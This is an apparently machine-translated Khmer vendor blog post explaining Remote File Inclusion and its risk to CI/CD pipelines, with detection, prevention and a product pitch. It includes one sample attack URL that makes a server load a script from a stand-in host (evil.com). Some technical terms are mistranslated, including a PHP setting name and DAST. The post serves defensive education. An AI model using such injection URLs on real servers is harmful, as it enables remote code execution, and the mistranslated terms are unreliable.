ហេតុអ្វីបានជាការដាក់បញ្ចូលឯកសារពីចម្ងាយមានសារៈសំខាន់នៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី?
តើការរួមបញ្ចូលឯកសារពីចម្ងាយជាអ្វី?
ការយល់ដឹងអំពីអ្វីទៅជាការដាក់បញ្ចូលឯកសារពីចម្ងាយ គឺមានសារៈសំខាន់សម្រាប់អ្នកអភិវឌ្ឍន៍ដែលកំពុងស្វែងរកការធានាសុវត្ថិភាពកម្មវិធីរបស់ពួកគេនៅដើមដំបូងនៃវដ្តជីវិតអភិវឌ្ឍន៍កម្មវិធី (SDLC)។ ចំណុចខ្សោយនេះ ដែលជារឿយៗត្រូវបានគេមើលរំលង អនុញ្ញាតឱ្យអ្នកវាយប្រហារចាក់ និងប្រតិបត្តិកូដពីចម្ងាយ ដោយដាក់ប្រព័ន្ធ និង pipelines ស្ថិតក្នុងហានិភ័យ។
ការរួមបញ្ចូលឯកសារពីចម្ងាយ (RFI) គឺជាចំណុចខ្សោយសុវត្ថិភាពដ៏សំខាន់មួយដែលអនុញ្ញាតឱ្យអ្នកវាយប្រហាររួមបញ្ចូល និងប្រតិបត្តិឯកសារខាងក្រៅនៅលើម៉ាស៊ីនមេរបស់អ្នក ដែលជារឿយៗនាំឱ្យមានការប្រតិបត្តិកូដពីចម្ងាយ (RCE)។ នៅក្នុងការអនុវត្ត នេះមានន័យថា ជនល្មើសដែលមានគំនិតអាក្រក់អាចដំណើរការកូដតាមអំពើចិត្តនៅក្នុងបរិស្ថានរបស់អ្នក ធ្វើឱ្យខូចដល់ការបង្កើត ឬចាក់បញ្ចូលវត្ថុបុរាណដ៏គ្រោះថ្នាក់ទៅក្នុង... pipelineអ្វីដែលចាប់ផ្តើមជាបញ្ហាផ្ទៀងផ្ទាត់ការបញ្ចូលតូចមួយអាចក្លាយជាការគំរាមកំហែងដល់ខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីទាំងស្រុង។
ខណៈពេលដែល RFI ត្រូវបានផ្សារភ្ជាប់ជាទូទៅជាមួយ PHP គំរូមូលដ្ឋាន ការផ្ទុកឯកសារដែលមិនគួរឱ្យទុកចិត្តដោយផ្អែកលើការបញ្ចូលរបស់អ្នកប្រើប្រាស់ អាចប៉ះពាល់ដល់ភាសាសរសេរកម្មវិធីជាច្រើន និង CI/CD លំហូរការងារ។ នោះហើយជាមូលហេតុដែលការយល់ដឹងអំពីភាពងាយរងគ្រោះនេះគឺមានសារៈសំខាន់សម្រាប់ក្រុមអភិវឌ្ឍន៍ទំនើប ជាពិសេសនៅពេលដែលសុវត្ថិភាពត្រូវតែបង្កប់ពីកូដរហូតដល់ការដាក់ពង្រាយ។
នៅក្នុងសេណារីយ៉ូជាក់ស្តែង ការវាយប្រហារដោយការដាក់បញ្ចូលឯកសារពីចម្ងាយបាននាំឱ្យមានការប្រតិបត្តិកូដពីចម្ងាយដោយគ្មានការអនុញ្ញាត ការលួចចូលម៉ាស៊ីនមេពេញលេញ ការលួចយកទិន្នន័យរសើប និងការរំលោភយ៉ាងធ្ងន់ធ្ងរលើព្រំដែននៃការជឿទុកចិត្តនៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។ ភាពងាយរងគ្រោះនេះជាធម្មតាប៉ះពាល់ដល់កម្មវិធីដែលមានមូលដ្ឋានលើ PHP និងបរិស្ថានគ្រប់គ្រងឯកសារថាមវន្ត ទោះបីជាគំរូស្រដៀងគ្នានេះអាចបង្ហាញនៅក្នុងភាសាសរសេរកម្មវិធី និងក្របខ័ណ្ឌផ្សេងទៀតក៏ដោយ។ ចូរយើងស្វែងយល់ឱ្យកាន់តែស៊ីជម្រៅអំពីមូលហេតុដែលការយល់ដឹងអំពីអ្វីដែលជាការដាក់បញ្ចូលឯកសារពីចម្ងាយ និងរបៀបដែលវាដំណើរការអាចជួយការពារឧប្បត្តិហេតុប្រតិបត្តិកូដពីចម្ងាយដ៏គ្រោះថ្នាក់។
តើការរួមបញ្ចូលឯកសារពីចម្ងាយដំណើរការយ៉ាងដូចម្តេច?
ការដាក់បញ្ចូលឯកសារពីចម្ងាយ (RFI) កើតឡើងនៅពេលដែលកម្មវិធីរួមបញ្ចូលឯកសារខាងក្រៅដោយថាមវន្តដោយផ្អែកលើ ការបញ្ចូលរបស់អ្នកប្រើប្រាស់ដែលមិនទាន់ត្រូវបានផ្ទៀងផ្ទាត់ត្រឹមត្រូវ។ នេះបើកឱកាសឱ្យអ្នកវាយប្រហារចាក់កូដព្យាបាទពីប្រភពពីចម្ងាយ ដែលជារឿយៗបណ្តាលឱ្យមានការប្រតិបត្តិកូដពីចម្ងាយ (RCE)។
របៀបដែលការកេងប្រវ័ញ្ចដំណើរការ - មួយជំហានម្តងៗ
- ការបញ្ចូលដែលមិនបានផ្ទៀងផ្ទាត់៖ កម្មវិធីប្រើប៉ារ៉ាម៉ែត្រសំណួរ ឬការបញ្ចូលផ្សេងទៀតរបស់អ្នកប្រើប្រាស់ ដើម្បីសម្រេចចិត្តថាឯកសារណាដែលត្រូវរួមបញ្ចូល។
- ការរួមបញ្ចូលឯកសារពីចម្ងាយ: ការបញ្ចូលនោះត្រូវបានប្រើដោយផ្ទាល់នៅក្នុងអនុគមន៍ដាក់បញ្ចូលឯកសារ (ដូចជា
include()(ក្នុង PHP) ដោយមិនចាំបាច់ពិនិត្យមើលប្រភពដើម ឬសុពលភាព។ - ការអនុវត្តកូដពីចម្ងាយ៖ ប្រសិនបើការបញ្ចូលចង្អុលទៅស្គ្រីបពីចម្ងាយដែលមានគំនិតអាក្រក់ ម៉ាស៊ីនមេនឹងទាញយក និងប្រតិបត្តិវា ដែលធ្វើឲ្យខូចប្រព័ន្ធ។
ឧទាហរណ៍នៃកូដ PHP ដែលងាយរងគ្រោះ៖
នៅក្នុងឧទាហរណ៍នេះ អ្នកវាយប្រហារអាចរៀបចំប៉ារ៉ាម៉ែត្រទំព័រដើម្បីយោងទៅ URL ខាងក្រៅដែលមានគំនិតអាក្រក់ ដែលនាំទៅដល់ការប្រតិបត្តិកូដពីចម្ងាយ។
វិធីសាស្ត្រចាក់បញ្ចូលទូទៅរួមមានការបញ្ជូន URL ពីចម្ងាយជាប៉ារ៉ាម៉ែត្រសំណួរ។ អ្នកវាយប្រហារបង្ហោះស្គ្រីបព្យាបាទទៅខាងក្រៅ ហើយកែប្រែ URL ដូចនេះ៖ http://example.com/index.php?page=http://evil.com/malicious.php
សេណារីយ៉ូវាយប្រហារ
សេណារីយ៉ូនេះបង្ហាញពីរបៀបដែល RFI ពង្រីកហួសពីកូដពេលដំណើរការ និងប៉ះពាល់ដល់ ខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីនៅពេលដែលវត្ថុបុរាណដែលមានគំនិតអាក្រក់ត្រូវបានទាញចូលទៅក្នុង pipelineអ្នកវាយប្រហារអាចបំពុល builds កែប្រែតក្កវិជ្ជានៃការដាក់ពង្រាយ ឬលួចយកអាថ៌កំបាំងពីក្នុងបរិយាកាសដែលទុកចិត្ត។
- ការដាក់ពង្រាយ Web Shell៖ អ្នកវាយប្រហារផ្ទុក web shell ពីចម្ងាយ ដែលអាចឱ្យមានការចូលប្រើពីចម្ងាយជាអចិន្ត្រៃយ៍។
- ការបង្ហោះមេរោគ៖ ម៉ាស៊ីនមេខាងក្រៅបញ្ជូនមេរោគ ឬឧបករណ៍ជីកយករ៉ែគ្រីបតូតាមរយៈ RFI។
- ការប្រតិបត្តិកូដនៅក្នុង Pipelines: នៅពេលដែលភាពងាយរងគ្រោះរបស់ RFI ប៉ះពាល់ដល់ប្រព័ន្ធ backend ឬបរិស្ថានសាងសង់ដោយស្វ័យប្រវត្តិ ឯកសារខាងក្រៅដែលរងការលួចចូលអាចដើរតួជាវត្ថុបុរាណពីចម្ងាយដែលចាក់បញ្ចូល ដែលធ្វើឱ្យកម្មវិធីទាំងមូលตกอยู่ในគ្រោះថ្នាក់។ pipelineនិងនាំទៅរកការប្រតិបត្តិកូដពីចម្ងាយដែលរកមិនឃើញនៅក្នុងលំហូរការងារ DevOps។
លំហូរវាយប្រហារធម្មតា៖
១. អ្នកវាយប្រហារបង្ហោះស្គ្រីបព្យាបាទ
2. ការរៀបចំប៉ារ៉ាម៉ែត្រ URL ដឹកនាំកម្មវិធីឱ្យទៅយក និងប្រតិបត្តិស្គ្រីបពីចម្ងាយនេះ
៣. ម៉ាស៊ីនមេដំណើរការកូដដែលមិនគួរឱ្យទុកចិត្ត ដែលធ្វើឱ្យប៉ះពាល់ដល់បរិស្ថានរបស់វា និងប្រព័ន្ធខាងក្រោមដែលអាចកើតមាន។
នៅក្នុងការអភិវឌ្ឍន៍ដែលមានសុវត្ថិភាព ការដឹងពីអ្វីដែលជាការរួមបញ្ចូលឯកសារពីចម្ងាយអាចជួយក្រុមឱ្យជៀសវាងការណែនាំអំពីភាពងាយរងគ្រោះបែបនេះនៅដើមដំបូងនៃវដ្តជីវិតរបស់កម្មវិធី។
ការរកឃើញ និងសូចនាករនៃភាពងាយរងគ្រោះនៃការដាក់បញ្ចូលឯកសារពីចម្ងាយ
ការរកឃើញចំណុចខ្សោយនៃការដាក់បញ្ចូលឯកសារពីចម្ងាយទាមទារទាំងការវិភាគកូដឋិតិវន្ត និងការត្រួតពិនិត្យឥរិយាបថ។ ដោយសារតែ RFI ជារឿយៗកេងប្រវ័ញ្ចគំរូកូដដែលហាក់ដូចជាគ្មានគ្រោះថ្នាក់ ក្រុមអភិវឌ្ឍន៍ និងក្រុមសន្តិសុខត្រូវតែតាមដានទាំងការអនុវត្តកូដដែលមិនមានសុវត្ថិភាព និងឥរិយាបថពេលដំណើរការមិនធម្មតាដែលបង្ហាញពីព្រំដែនជឿទុកចិត្តដែលត្រូវបានសម្របសម្រួល។ ខាងក្រោមនេះគឺជាសូចនាករសំខាន់ៗដើម្បីជួយកំណត់អត្តសញ្ញាណហានិភ័យ RFI នៅដើមដំបូងនៃវដ្តជីវិតកម្មវិធីរបស់អ្នក។
- សូចនាករពិនិត្យឡើងវិញនៃកូដ៖
- ការប្រើប្រាស់ការរួមបញ្ចូលឯកសារថាមវន្តដោយគ្មានការផ្ទៀងផ្ទាត់ការបញ្ចូលយ៉ាងតឹងរ៉ឹង
- ការរួមបញ្ចូលឯកសារពីចម្ងាយដោយផ្អែកលើប៉ារ៉ាម៉ែត្រ URL
- សូចនាករអាកប្បកិរិយា៖
- ការហៅធនធានពីចម្ងាយដែលមិននឹកស្មានដល់ពីម៉ាស៊ីនមេដែលទុកចិត្ត
- កំណត់ហេតុដែលបង្ហាញពីការរួមបញ្ចូលឯកសារខាងក្រៅ
- ស្គ្រីបមិនធម្មតាដែលបានប្រតិបត្តិពីផ្លូវមិនមែនក្នុងស្រុក ដែលបង្ហាញពីព្រំដែននៃការជឿទុកចិត្តដែលត្រូវបានសម្របសម្រួល
- ឧបករណ៍រកឃើញ៖
- ការធ្វើតេស្តសុវត្ថិភាពកម្មវិធីឋិតិវន្ត (SAST)
- ការធ្វើតេស្តសុវត្ថិភាពកម្មវិធីថាមវន្ត (ស្ងួត)
- ការវិភាគសមាសភាពកម្មវិធី (SCA)
- ការរកឃើញភាពមិនធម្មតា សម្រាប់សំណើខាងក្រៅមិនធម្មតា។
ការជ្រមុជទឹកជ្រៅចូលទៅក្នុង CI/CD Pipelineភាពងាយរងគ្រោះ
សូមពិនិត្យមើលស៊េរីប្លុករបស់យើងនៅលើ Poisoned Pipeline ការប្រតិបត្តិ (PPE)
ហានិភ័យ និងផលប៉ះពាល់អាជីវកម្ម
- ការស្រង់ទិន្នន័យ៖ ព័ត៌មានរសើបអាចត្រូវបានលួចយកតាមរយៈស្គ្រីបពីចម្ងាយដែលមានគំនិតអាក្រក់
- ការសម្របសម្រួលម៉ាស៊ីនមេ៖ RFI ជារឿយៗបណ្តាលឱ្យមានការកាន់កាប់ម៉ាស៊ីនមេពេញលេញ
- ការចាក់បញ្ចូលវត្ថុបុរាណពីចម្ងាយដែលមានគំនិតអាក្រក់៖ នៅពេលដែលអ្នកវាយប្រហារបញ្ចូល artifact ពីចម្ងាយ ការសាងសង់ និងការដាក់ពង្រាយនៅផ្នែកខាងក្រោមប្រឈមនឹងហានិភ័យនៃការចម្លងមេរោគ។
- ព្រំដែននៃការជឿទុកចិត្តដែលត្រូវបានរំលោភបំពាន៖ CI/CD pipelineកំពុងប្រតិបត្តិកូដបំបែកដែលមិនគួរឱ្យទុកចិត្តនៃភាពសុចរិតនៃខ្សែសង្វាក់ផ្គត់ផ្គង់ស្នូល
- ហានិភ័យនៃការអនុលោមភាព៖ ការមិនអនុលោមតាម GDPR, PCI DSS និងផ្សេងៗទៀត standardដោយសារតែការអនុវត្តការសរសេរកូដដែលមានសុវត្ថិភាពមិនគ្រប់គ្រាន់
បច្ចេកទេសបង្ការសម្រាប់អ្នកអភិវឌ្ឍន៍
នៅទីនេះ អ្នកនឹងឃើញបញ្ជីនៃបច្ចេកទេសបង្ការមួយចំនួន ដែលអាចជួយអ្នកបាន៖
ការបញ្ចូលសុពលភាព និងអនាម័យ
- បញ្ជីអនុញ្ញាតយ៉ាងតឹងរ៉ឹងនៃផ្លូវឯកសារដែលអាចទទួលយកបាន
- ការជៀសវាងផ្លូវឯកសារថាមវន្តនៅពេលណាដែលអាចធ្វើទៅបាន
- ការផ្ទៀងផ្ទាត់ MIME/type និងការអនុវត្តផ្នែកបន្ថែមឯកសារដែលមានសុវត្ថិភាព
- ប្រើបណ្ណាល័យផ្ទៀងផ្ទាត់ការបញ្ចូលជាក់លាក់តាមភាសា
ការអនុវត្តការសរសេរកូដប្រកបដោយសុវត្ថិភាព
- បិទការរួមបញ្ចូលឯកសារពីចម្ងាយដោយប្រើការកំណត់រចនាសម្ព័ន្ធដូចជា អនុញ្ញាត_url_include=បិទ (PHP)
- អនុវត្តផ្លូវក្នុងស្រុកដាច់ខាត ដែលបានផ្ទៀងផ្ទាត់ សម្រាប់ការរួមបញ្ចូលឯកសារទាំងអស់
- អនុវត្តគោលការណ៍នៃសិទ្ធិតិចតួចបំផុតនៅទូទាំងបរិស្ថានកម្មវិធី
- រារាំងធនធានពីចម្ងាយដែលមិនបានចុះហត្ថលេខា ឬមិនគួរឱ្យទុកចិត្ត
DevSecOps និង CI/CD Guardrails
- អនុវត្តការស្កេនឋិតិវន្ត និងថាមវន្តនៅក្នុង CI/CD pipelines
- បង្កើត guardrails ដើម្បីរកឃើញ និងរារាំងការរួមបញ្ចូលឯកសារពីចម្ងាយ
- អនុវត្តគោលការណ៍កូដតឹងរ៉ឹងប្រឆាំងនឹងការដាក់បញ្ចូលឯកសារថាមវន្ត និងមិនទាន់បានផ្ទៀងផ្ទាត់
- ត្រួតពិនិត្យដំណើរការសាងសង់សម្រាប់សំណើធនធានខាងក្រៅដែលមិនត្រូវបានអនុម័ត
យុទ្ធសាស្ត្រការពារពេលដំណើរការ
- ប្រើប្រាស់ Web Application Firewalls (WAFs) ដើម្បីទប់ស្កាត់សំណើដែលមានគំនិតអាក្រក់
- ប្រើប្រាស់ការរកឃើញភាពមិនប្រក្រតីជាបន្តបន្ទាប់ និងការត្រួតពិនិត្យសុវត្ថិភាព
- ធ្វើការត្រួតពិនិត្យកូដជាប្រចាំ និងការធ្វើតេស្តជ្រៀតចូលដែលផ្តោតលើសុវត្ថិភាព
ការឆ្លើយតបដោយចៃដន្យ
អ្វីដែលត្រូវធ្វើប្រសិនបើការបញ្ចូលឯកសារពីចម្ងាយត្រូវបានកេងប្រវ័ញ្ច?
អនុវត្តតាមជំហាននេះ៖
- ញែកម៉ាស៊ីនមេ ឬសេវាកម្មដែលរងផលប៉ះពាល់ចេញជាបន្ទាន់
- វិភាគកំណត់ហេតុដើម្បីតាមដានសកម្មភាពរបស់អ្នកវាយប្រហារ និងកំណត់អត្តសញ្ញាណធនធានដែលរងការគំរាមកំហែង
- ជួសជុលកូដដែលងាយរងគ្រោះ និងកំណត់រចនាសម្ព័ន្ធកម្មវិធីដែលរងផលប៉ះពាល់ឡើងវិញ
- អនុវត្តការវិភាគផ្នែកកោសល្យវិច្ច័យ ដើម្បីផ្ទៀងផ្ទាត់ភាពសុចរិតនៃផ្នែកខាងក្រោម pipeline សមាសភាគ
- ពង្រឹងការគ្រប់គ្រងដើម្បីការពារការកើតឡើងវិញ
ដូច្នេះ សូមចាត់ទុកការដាក់បញ្ចូលឯកសារពីចម្ងាយជាការគំរាមកំហែងដល់ខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី
ឥឡូវនេះ អ្នកបានដឹងហើយថា ការដាក់បញ្ចូលឯកសារពីចម្ងាយជាអ្វី អ្នកមិនគួរចាត់ទុកវាថាជាកំហុសសរសេរកូដសាមញ្ញទៀតទេ។ វាគឺជាវ៉ិចទ័រដ៏សំខាន់មួយដែលអាចចាក់បញ្ចូលវត្ថុបុរាណដែលមានគំនិតអាក្រក់ និងរំលោភលើព្រំដែននៃការជឿទុកចិត្តនៅទូទាំងកម្មវិធីរបស់អ្នក pipelines. ដោយការធ្វើឱ្យខូចដល់ម៉ាស៊ីនបម្រើខាងក្រោយ ឬ CI/CD ដំណើរការ RFI អនុញ្ញាតឱ្យអ្នកវាយប្រហារកែប្រែការបង្កើត ណែនាំការផ្លាស់ប្តូរដែលគ្មានការអនុញ្ញាត និងផ្សព្វផ្សាយកូដដែលរងការសម្របសម្រួលនៅខាងក្រោម។ ការមិនអើពើនឹងហានិភ័យនៃការប្រតិបត្តិកូដពីចម្ងាយដែលកើតចេញពី RFI អាចធ្វើឱ្យខ្សែសង្វាក់ផ្គត់ផ្គង់របស់អ្នកងាយរងគ្រោះ។
អង្គការនានាត្រូវតែបញ្ចូលវិធានការបង្ការ RFI នៅទូទាំង SDLC និង CI/CD លំហូរការងារ។ នេះរួមបញ្ចូលទាំងការវិភាគឋិតិវន្ត និងថាមវន្ត ការផ្ទៀងផ្ទាត់ការបញ្ចូលយ៉ាងតឹងរ៉ឹង ការពង្រឹងហេដ្ឋារចនាសម្ព័ន្ធ និងការត្រួតពិនិត្យជាបន្តបន្ទាប់។ ការអប់រំអ្នកអភិវឌ្ឍន៍ និងការអនុវត្តសុវត្ថិភាពតាមការរចនាគឺមានសារៈសំខាន់ណាស់ដើម្បីការពារប្រឆាំងនឹង RFI និងការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ដែលពាក់ព័ន្ធ។
ចុងក្រោយ ប៉ុន្តែមិនសំខាន់តិចជាងនេះទេ ការធានាសុវត្ថិភាពខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីទំនើបតម្រូវឱ្យមានការប្រុងប្រយ័ត្នប្រឆាំងនឹងភាពងាយរងគ្រោះដូចជាការបញ្ចូលឯកសារពីចម្ងាយ ដែលអាចកើនឡើងពីកំហុសសាមញ្ញទៅ pipeline-ការសម្របសម្រួលយ៉ាងទូលំទូលាយ ដែលបណ្តាលឱ្យមានសេណារីយ៉ូប្រតិបត្តិកូដពីចម្ងាយដ៏គ្រោះថ្នាក់។
ចង់រៀនពីអ្នកជំនាញសន្តិសុខតាមអ៊ីនធឺណិតកំពូលៗទេ? សូមទស្សនាការពិភាក្សា SafeDev របស់យើងនៅលើ ភាពងាយរងគ្រោះគ្មានទីបញ្ចប់ ការការពារឆ្លាតវៃជាងមុន – ការរុករកហានិភ័យនៃកម្មវិធីទំនើប នៅលើ YouTube!
របៀបដែល Xygeni អាចជួយបាន
ស៊ីហ្គេនី ផ្តល់នូវការការពារជាមុនប្រឆាំងនឹងការវាយប្រហារ RFI ដោយបង្កប់ការគ្រប់គ្រងសុវត្ថិភាពពេលវេលាជាក់ស្តែងនៅទូទាំង CI/CD pipelines:
- រារាំងការរួមបញ្ចូលពីចម្ងាយដែលមិនគួរឱ្យទុកចិត្ត នៅដំណាក់កាលសាងសង់ដោយប្រើអាចប្ដូរតាមបំណងបាន guardrails.
- រកឃើញឥរិយាបថមិនប្រក្រតី ដូចជាការទាញយកពីខាងក្រៅដែលគួរឱ្យសង្ស័យ ការប្រតិបត្តិស្គ្រីបដែលមិនបានរំពឹងទុក ឬវត្ថុបុរាណពីចម្ងាយដែលមិនបានចុះហត្ថលេខា។
- អនុវត្តភាពសុចរិតនៃវត្ថុបុរាណយ៉ាងតឹងរ៉ឹង ជាមួយនឹងការបញ្ជាក់ និងការផ្ទៀងផ្ទាត់ប្រភពដើម ដោយធានាថាមានតែលេខកូដដែលអាចទុកចិត្តបានប៉ុណ្ណោះដែលផ្លាស់ទីតាមរយៈ SDLC.
អ្នកឃ្លាំមើល CI/CD ការកំណត់រចនាសម្ព័ន្ធ និងនិយមន័យការងារ ដើម្បីការពារការប៉ះពាល់ដោយអចេតនាចំពោះហានិភ័យដូច RFI នៅក្នុងស្គ្រីបសាងសង់ ឬកម្មវិធីជំនួយ។
តាមរយៈការស្កេនជាបន្តបន្ទាប់សម្រាប់ការកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវ ការវិភាគឥរិយាបថកូដ និងការផ្ទៀងផ្ទាត់វត្ថុបុរាណក្នុងពេលវេលាជាក់ស្តែង Xygeni បញ្ឈប់ RFI និងការគំរាមកំហែងប្រតិបត្តិពីចម្ងាយផ្សេងទៀត។ មុនពេលពួកគេឈានដល់ការផលិត.
ចាប់ផ្តើមការសាកល្បងឥតគិតថ្លៃរបស់អ្នក។ ហើយមើលពីរបៀបដែល Xygeni ការពារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីរបស់អ្នកពីការវាយប្រហារ RFI និងលើសពីនេះ។







